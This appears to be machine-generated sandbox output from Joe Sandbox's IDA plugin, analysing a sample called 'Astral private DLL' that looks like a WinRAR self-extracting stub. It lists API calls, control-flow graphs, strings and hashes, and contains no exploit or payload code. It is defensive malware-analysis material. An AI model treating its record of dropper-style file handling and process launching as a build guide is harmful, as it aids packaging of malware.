                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0017A762
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0017A7C6
                                                                  • Part of subcall function 0017A626: GdipAlloc.GDIPLUS(00000010), ref: 0017A62C
                                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0017A7A7
                                                                • GlobalFree.KERNEL32(00000000), ref: 0017A7CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                • String ID: PNG
                                                                • API String ID: 211097158-364855578
                                                                • Opcode ID: 3752dcbcc7e2e4b4255842b23ae3ecc0974ca21c8d1739f2e65cc61042bcae6a
                                                                • Instruction ID: ac7516d501098189fde6c2363bbf91e71ff563d384a4b8edfd0f97ecb1cb2d52
                                                                • Opcode Fuzzy Hash: 3752dcbcc7e2e4b4255842b23ae3ecc0974ca21c8d1739f2e65cc61042bcae6a
                                                                • Instruction Fuzzy Hash: 87319376600312BFD7159F21DC88D2F7BBDEF85750B04452AF91982A60EB32DD84CAA2

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1029 16a69b-16a6bf call 17ec50 1032 16a727-16a730 FindNextFileW 1029->1032 1033 16a6c1-16a6ce FindFirstFileW 1029->1033 1034 16a742-16a7ff call 170602 call 16c310 call 1715da * 3 1032->1034 1036 16a732-16a740 GetLastError 1032->1036 1033->1034 1035 16a6d0-16a6e2 call 16bb03 1033->1035 1041 16a804-16a811 1034->1041 1044 16a6e4-16a6fc FindFirstFileW 1035->1044 1045 16a6fe-16a707 GetLastError 1035->1045 1038 16a719-16a722 1036->1038 1038->1041 1044->1034 1044->1045 1047 16a717 1045->1047 1048 16a709-16a70c 1045->1048 1047->1038 1048->1047 1050 16a70e-16a711 1048->1050 1050->1047 1052 16a713-16a715 1050->1052 1052->1038
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6C4
                                                                  • Part of subcall function 0016BB03: _wcslen.LIBCMT ref: 0016BB27
                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6F2
                                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6FE
                                                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A728
                                                                • GetLastError.KERNEL32(?,?,?,?,0016A592,000000FF,?,?), ref: 0016A734
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                • String ID:
                                                                • API String ID: 42610566-0
                                                                • Opcode ID: ec7b1eae8b00a8753ea414045063507c84cc5c219da44b26213b35ffe7b7774d
                                                                • Instruction ID: 6fad44cc3cbc6b8ac4ce2e97e509a87e61ba32480954563ac1dda87d3ff6c8ad
                                                                • Opcode Fuzzy Hash: ec7b1eae8b00a8753ea414045063507c84cc5c219da44b26213b35ffe7b7774d
                                                                • Instruction Fuzzy Hash: DC417E72900515ABCB25DF68CC88AEAB7B9FF48350F544296F56DE3200D7346EA0CF90
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000000,?,00187DC4,00000000,0019C300,0000000C,00187F1B,00000000,00000002,00000000), ref: 00187E0F
                                                                • TerminateProcess.KERNEL32(00000000,?,00187DC4,00000000,0019C300,0000000C,00187F1B,00000000,00000002,00000000), ref: 00187E16
                                                                • ExitProcess.KERNEL32 ref: 00187E28
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: ea41575a1ae8188368be410ea71c7ce06e457d6e9216d5b1390b79ea2463704c
                                                                • Instruction ID: ed76b2081af0224b75182309763828714846ecb0c548422252303fc37847d668
                                                                • Opcode Fuzzy Hash: ea41575a1ae8188368be410ea71c7ce06e457d6e9216d5b1390b79ea2463704c
                                                                • Instruction Fuzzy Hash: 24E0B631004548ABCF117F64DD4AA8A7F6AEB50382B144455F8298A572CB36EF92CFA8
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 1ef73e1eaff57a0d7d31d9d0f8948dc9b8c95433252f47f3e33240655e9dd55a
                                                                • Instruction ID: 6e984f86f8d4724be38438c79c9d70e3ec0708df66dee7907fbe1c352876ec37
                                                                • Opcode Fuzzy Hash: 1ef73e1eaff57a0d7d31d9d0f8948dc9b8c95433252f47f3e33240655e9dd55a
                                                                • Instruction Fuzzy Hash: 3F820C71904245AFDF15DF64CC95BFABBB9BF15300F0842B9E8499B182DF315AA8CB60
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0017B7E5
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0017B8D1
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017B8EF
                                                                • IsDialogMessageW.USER32(?,?), ref: 0017B902
                                                                • TranslateMessage.USER32(?), ref: 0017B910
                                                                • DispatchMessageW.USER32(?), ref: 0017B91A
                                                                • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0017B93D
                                                                • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0017B960
                                                                • GetDlgItem.USER32(?,00000068), ref: 0017B983
                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0017B99E
                                                                • SendMessageW.USER32(00000000,000000C2,00000000,001935F4), ref: 0017B9B1
                                                                  • Part of subcall function 0017D453: _wcslen.LIBCMT ref: 0017D47D
                                                                • SetFocus.USER32(00000000), ref: 0017B9B8
                                                                • _swprintf.LIBCMT ref: 0017BA24
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                  • Part of subcall function 0017D4D4: GetDlgItem.USER32(00000068,001BFCB8), ref: 0017D4E8
                                                                  • Part of subcall function 0017D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0017AF07,00000001,?,?,0017B7B9,0019506C,001BFCB8,001BFCB8,00001000,00000000,00000000), ref: 0017D510
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0017D51B
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001935F4), ref: 0017D529
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017D53F
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0017D559
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017D59D
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0017D5AB
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017D5BA
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017D5E1
                                                                  • Part of subcall function 0017D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001943F4), ref: 0017D5F0
                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0017BA68
                                                                • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0017BA90
                                                                • GetTickCount.KERNEL32 ref: 0017BAAE
                                                                • _swprintf.LIBCMT ref: 0017BAC2
                                                                • GetLastError.KERNEL32(?,00000011), ref: 0017BAF4
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0017BB43
                                                                • _swprintf.LIBCMT ref: 0017BB7C
                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0017BBD0
                                                                • GetCommandLineW.KERNEL32 ref: 0017BBEA
                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0017BC47
                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 0017BC6F
                                                                • Sleep.KERNEL32(00000064), ref: 0017BCB9
                                                                • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0017BCE2
                                                                • CloseHandle.KERNEL32(00000000), ref: 0017BCEB
                                                                • _swprintf.LIBCMT ref: 0017BD1E
                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0017BD7D
                                                                • SetDlgItemTextW.USER32(?,00000065,001935F4), ref: 0017BD94
                                                                • GetDlgItem.USER32(?,00000065), ref: 0017BD9D
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0017BDAC
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0017BDBB
                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0017BE68
                                                                • _wcslen.LIBCMT ref: 0017BEBE
                                                                • _swprintf.LIBCMT ref: 0017BEE8
                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0017BF32
                                                                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0017BF4C
                                                                • GetDlgItem.USER32(?,00000068), ref: 0017BF55
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0017BF6B
                                                                • GetDlgItem.USER32(?,00000066), ref: 0017BF85
                                                                • SetWindowTextW.USER32(00000000,001AA472), ref: 0017BFA7
                                                                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0017C007
                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0017C01A
                                                                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0017C0BD
                                                                • EnableWindow.USER32(00000000,00000000), ref: 0017C197
                                                                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0017C1D9
                                                                  • Part of subcall function 0017C73F: __EH_prolog.LIBCMT ref: 0017C744
                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0017C1FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                • API String ID: 3445078344-4182265032
                                                                • Opcode ID: 682c78e55f2819c9fc1b86d9bce2177afc181163d5c2433e43633bd72b2a7852
                                                                • Instruction ID: 7a9363847be1461071314a3ddb1c90018d896a937b6fae149615a749f70d76bf
                                                                • Opcode Fuzzy Hash: 682c78e55f2819c9fc1b86d9bce2177afc181163d5c2433e43633bd72b2a7852
                                                                • Instruction Fuzzy Hash: 0D421D71948244BEEB21AB74DC4AFFE3B7CAB16700F048159F649A64D2CB749EC4CB61

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 268 170863-170886 call 17ec50 GetModuleHandleW 271 1708e7-170b48 268->271 272 170888-17089f GetProcAddress 268->272 273 170c14-170c40 GetModuleFileNameW call 16c29a call 170602 271->273 274 170b4e-170b59 call 1875fb 271->274 275 1708a1-1708b7 272->275 276 1708b9-1708c9 GetProcAddress 272->276 291 170c42-170c4e call 16b146 273->291 274->273 286 170b5f-170b8d GetModuleFileNameW CreateFileW 274->286 275->276 279 1708e5 276->279 280 1708cb-1708e0 276->280 279->271 280->279 288 170b8f-170b9b SetFilePointer 286->288 289 170c08-170c0f CloseHandle 286->289 288->289 292 170b9d-170bb9 ReadFile 288->292 289->273 298 170c50-170c5b call 17081b 291->298 299 170c7d-170ca4 call 16c310 GetFileAttributesW 291->299 292->289 294 170bbb-170be0 292->294 296 170bfd-170c06 call 170371 294->296 296->289 304 170be2-170bfc call 17081b 296->304 298->299 309 170c5d-170c7b CompareStringW 298->309 306 170ca6-170caa 299->306 307 170cae 299->307 304->296 306->291 310 170cac 306->310 311 170cb0-170cb5 307->311 309->299 309->306 310->311 313 170cb7 311->313 314 170cec-170cee 311->314 315 170cb9-170ce0 call 16c310 GetFileAttributesW 313->315 316 170cf4-170d0b call 16c2e4 call 16b146 314->316 317 170dfb-170e05 314->317 323 170ce2-170ce6 315->323 324 170cea 315->324 327 170d73-170da6 call 164092 AllocConsole 316->327 328 170d0d-170d6e call 17081b * 2 call 16e617 call 164092 call 16e617 call 17a7e4 316->328 323->315 326 170ce8 323->326 324->314 326->314 333 170df3-170df5 ExitProcess 327->333 334 170da8-170ded GetCurrentProcessId AttachConsole call 183e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32), ref: 0017087C
                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017088E
                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001708BF
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00170B69
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00170B83
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00170B93
                                                                • ReadFile.KERNEL32(00000000,?,00007FFE,00193C7C,00000000), ref: 00170BB1
                                                                • CloseHandle.KERNEL32(00000000), ref: 00170C09
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00170C1E
                                                                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00193C7C,?,00000000,?,00000800), ref: 00170C72
                                                                • GetFileAttributesW.KERNELBASE(?,?,00193C7C,00000800,?,00000000,?,00000800), ref: 00170C9C
                                                                • GetFileAttributesW.KERNEL32(?,?,00193D44,00000800), ref: 00170CD8
                                                                  • Part of subcall function 0017081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00170836
                                                                  • Part of subcall function 0017081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016F2D8,Crypt32.dll,00000000,0016F35C,?,?,0016F33E,?,?,?), ref: 00170858
                                                                • _swprintf.LIBCMT ref: 00170D4A
                                                                • _swprintf.LIBCMT ref: 00170D96
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                • AllocConsole.KERNEL32 ref: 00170D9E
                                                                • GetCurrentProcessId.KERNEL32 ref: 00170DA8
                                                                • AttachConsole.KERNEL32(00000000), ref: 00170DAF
                                                                • _wcslen.LIBCMT ref: 00170DC4
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00170DD5
                                                                • WriteConsoleW.KERNEL32(00000000), ref: 00170DDC
                                                                • Sleep.KERNEL32(00002710), ref: 00170DE7
                                                                • FreeConsole.KERNEL32 ref: 00170DED
                                                                • ExitProcess.KERNEL32 ref: 00170DF5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                • API String ID: 1207345701-3298887752
                                                                • Opcode ID: cca3628dce84ab92fc6c699a712aa7377e121b0a28ba3093c13b52b5bc06138f
                                                                • Instruction ID: 64a26c32bf61a901dd3123583511e6a575eb55c0431660f6e2f4e3dbf9835d64
                                                                • Opcode Fuzzy Hash: cca3628dce84ab92fc6c699a712aa7377e121b0a28ba3093c13b52b5bc06138f
                                                                • Instruction Fuzzy Hash: 69D183B1408384ABDB31DF50C949EDFBBF8BB89704F54491DF1A9A6150C7B09A49CBA3

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 347 17c73f-17c757 call 17eb78 call 17ec50 352 17d40d-17d418 347->352 353 17c75d-17c787 call 17b314 347->353 353->352 356 17c78d-17c792 353->356 357 17c793-17c7a1 356->357 358 17c7a2-17c7b7 call 17af98 357->358 361 17c7b9 358->361 362 17c7bb-17c7d0 call 171fbb 361->362 365 17c7d2-17c7d6 362->365 366 17c7dd-17c7e0 362->366 365->362 367 17c7d8 365->367 368 17c7e6 366->368 369 17d3d9-17d404 call 17b314 366->369 367->369 370 17ca5f-17ca61 368->370 371 17c9be-17c9c0 368->371 372 17c7ed-17c7f0 368->372 373 17ca7c-17ca7e 368->373 369->357 384 17d40a-17d40c 369->384 370->369 375 17ca67-17ca77 SetWindowTextW 370->375 371->369 377 17c9c6-17c9d2 371->377 372->369 378 17c7f6-17c850 call 17a64d call 16bdf3 call 16a544 call 16a67e call 166edb 372->378 373->369 376 17ca84-17ca8b 373->376 375->369 376->369 380 17ca91-17caaa 376->380 381 17c9e6-17c9eb 377->381 382 17c9d4-17c9e5 call 187686 377->382 433 17c98f-17c9a4 call 16a5d1 378->433 385 17cab2-17cac0 call 183e13 380->385 386 17caac 380->386 389 17c9f5-17ca00 call 17b48e 381->389 390 17c9ed-17c9f3 381->390 382->381 384->352 385->369 402 17cac6-17cacf 385->402 386->385 394 17ca05-17ca07 389->394 390->394 399 17ca12-17ca32 call 183e13 call 183e3e 394->399 400 17ca09-17ca10 call 183e13 394->400 421 17ca34-17ca3b 399->421 422 17ca4b-17ca4d 399->422 400->399 407 17cad1-17cad5 402->407 408 17caf8-17cafb 402->408 411 17cad7-17cadf 407->411 412 17cb01-17cb04 407->412 408->412 414 17cbe0-17cbee call 170602 408->414 411->369 419 17cae5-17caf3 call 170602 411->419 415 17cb06-17cb0b 412->415 416 17cb11-17cb2c 412->416 430 17cbf0-17cc04 call 18279b 414->430 415->414 415->416 434 17cb76-17cb7d 416->434 435 17cb2e-17cb68 416->435 419->430 427 17ca42-17ca4a call 187686 421->427 428 17ca3d-17ca3f 421->428 422->369 429 17ca53-17ca5a call 183e2e 422->429 427->422 428->427 429->369 449 17cc06-17cc0a 430->449 450 17cc11-17cc62 call 170602 call 17b1be GetDlgItem SetWindowTextW SendMessageW call 183e49 430->450 451 17c855-17c869 SetFileAttributesW 433->451 452 17c9aa-17c9b9 call 16a55a 433->452 440 17cb7f-17cb97 call 183e13 434->440 441 17cbab-17cbce call 183e13 * 2 434->441 470 17cb6c-17cb6e 435->470 471 17cb6a 435->471 440->441 463 17cb99-17cba6 call 1705da 440->463 441->430 475 17cbd0-17cbde call 1705da 441->475 449->450 453 17cc0c-17cc0e 449->453 481 17cc67-17cc6b 450->481 457 17c90f-17c91f GetFileAttributesW 451->457 458 17c86f-17c8a2 call 16b991 call 16b690 call 183e13 451->458 452->369 453->450 457->433 468 17c921-17c930 DeleteFileW 457->468 490 17c8b5-17c8c3 call 16bdb4 458->490 491 17c8a4-17c8b3 call 183e13 458->491 463->441 468->433 474 17c932-17c935 468->474 470->434 471->470 478 17c939-17c965 call 164092 GetFileAttributesW 474->478 475->430 488 17c937-17c938 478->488 489 17c967-17c97d MoveFileW 478->489 481->369 485 17cc71-17cc85 SendMessageW 481->485 485->369 488->478 489->433 492 17c97f-17c989 MoveFileExW 489->492 490->452 497 17c8c9-17c908 call 183e13 call 17fff0 490->497 491->490 491->497 492->433 497->457
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0017C744
                                                                  • Part of subcall function 0017B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0017B3FB
                                                                • _wcslen.LIBCMT ref: 0017CA0A
                                                                • _wcslen.LIBCMT ref: 0017CA13
                                                                • SetWindowTextW.USER32(?,?), ref: 0017CA71
                                                                • _wcslen.LIBCMT ref: 0017CAB3
                                                                • _wcsrchr.LIBVCRUNTIME ref: 0017CBFB
                                                                • GetDlgItem.USER32(?,00000066), ref: 0017CC36
                                                                • SetWindowTextW.USER32(00000000,?), ref: 0017CC46
                                                                • SendMessageW.USER32(00000000,00000143,00000000,001AA472), ref: 0017CC54
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0017CC7F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                • API String ID: 2804936435-312220925
                                                                • Opcode ID: da454de40969174d0e3bf8766960cd435d4640133755425feec186b4154d408d
                                                                • Instruction ID: 2ac25b774cab26520b54a5565a1579adf25e92c45fbbf0a9a16a8650ca12e82f
                                                                • Opcode Fuzzy Hash: da454de40969174d0e3bf8766960cd435d4640133755425feec186b4154d408d
                                                                • Instruction Fuzzy Hash: 39E156B2900119AADF25DBA4DC85DEE77BCAF14350F5481AAF609E7040EB74DF848F61
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0016DA70
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0016DAAC
                                                                  • Part of subcall function 0016C29A: _wcslen.LIBCMT ref: 0016C2A2
                                                                  • Part of subcall function 001705DA: _wcslen.LIBCMT ref: 001705E0
                                                                  • Part of subcall function 00171B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0016BAE9,00000000,?,?,?,0001043C), ref: 00171BA0
                                                                • _wcslen.LIBCMT ref: 0016DDE9
                                                                • __fprintf_l.LIBCMT ref: 0016DF1C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                • API String ID: 566448164-801612888
